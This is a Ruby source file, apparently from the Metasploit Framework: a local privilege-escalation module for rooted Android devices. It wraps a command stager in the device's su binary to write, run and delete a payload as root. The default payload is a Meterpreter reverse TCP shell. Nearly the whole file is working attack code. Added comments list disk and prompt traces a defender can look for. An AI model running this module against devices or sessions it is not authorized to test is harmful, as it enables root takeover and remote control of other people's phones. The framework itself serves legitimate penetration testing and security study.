GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/android/local/su_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local Metasploit module that reuses the su binary already present on a
# rooted Android device to run a payload as root from an existing session.
#
# Traces a defender can look for, per the module's own description and Notes:
# a payload binary is briefly written to WritableDir (default
# /data/local/tmp/), marked executable, run in the background and then
# deleted; on most devices the su binary also shows a permission prompt to
# the user.
class MetasploitModule < Msf::Exploit::Local
  # NOTE(review): presumably ranked Manual because the outcome depends on a
  # person approving the su prompt on the device - confirm.
  Rank = ManualRanking

  include Msf::Exploit::CmdStager
  include Msf::Post::File
  include Msf::Post::Android::Priv

  # Declares the module metadata and registers its two options.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Android 'su' Privilege Escalation",
        'Description' => %q{
          This module uses the su binary present on rooted devices to run
          a payload as root.

          A rooted Android device will contain a su binary (often linked with
          an application) that allows the user to run commands as root.
          This module will use the su binary to execute a command stager
          as root. The command stager will write a payload binary to a
          temporary directory, make it executable, execute it in the background,
          and finally delete the executable.

          On most devices the su binary will pop-up a prompt on the device
          asking the user for permission.
        },
        'Author' => 'timwr',
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2017-08-31',
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Platform' => [ 'android', 'linux' ],
        'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
        # One target per supported architecture; index 0 (aarch64) is the default.
        'Targets' => [
          ['aarch64', { 'Arch' => ARCH_AARCH64 }],
          ['armle', { 'Arch' => ARCH_ARMLE }],
          ['x86', { 'Arch' => ARCH_X86 }],
          ['x64', { 'Arch' => ARCH_X64 }],
          ['mipsle', { 'Arch' => ARCH_MIPSLE }]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay' => 5
        },
        'DefaultTarget' => 0,
        # Declared impact: the staged binary touches disk (ARTIFACTS_ON_DISK).
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        }
      )
    )

    register_options(
      [
        OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
        OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
      ]
    )
  end

  # @return [String] the WritableDir option, used as the stager's temp directory
  def base_dir
    datastore['WritableDir'].to_s
  end

  # @return [String] the SU_BINARY option (name or path of the su binary)
  def su_bin
    datastore['SU_BINARY'].to_s
  end

  # Entry point: stops when the session is already root, otherwise runs the
  # echo/octal command stager, every line of which goes through
  # execute_command below.
  def exploit
    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?

    # execute_command prepends su_bin to each stager line, so its length is
    # subtracted from the per-line budget.
    # NOTE(review): 4088 presumably leaves room for the " -c '...'" wrapper
    # under a 4096-byte command-line limit - confirm.
    stager_line_limit = 4088 - su_bin.size

    execute_cmdstager(
      flavor: :echo,
      enc_format: :octal,
      # NOTE(review): the backslash of the octal prefix is doubled, presumably
      # because each line passes through an extra shell via `su -c` - confirm.
      prefix: '\\\\0',
      temp: base_dir,
      linemax: stager_line_limit,
      background: true
    )
  end

  # CmdStager callback: wraps one stager command in `<su_bin> -c '<cmd>'` and
  # runs it in the session.
  #
  # NOTE(review): both su_bin and cmd are interpolated without shell escaping;
  # a single quote inside cmd would end the quoted argument early. Presumably
  # the octal echo stager never emits one - confirm.
  #
  # @param cmd [String] one command line produced by the stager
  # @param _opts [Hash] stager options, unused here
  def execute_command(cmd, _opts)
    wrapped = "#{su_bin} -c '#{cmd}'"
    cmd_exec(wrapped)
  end
end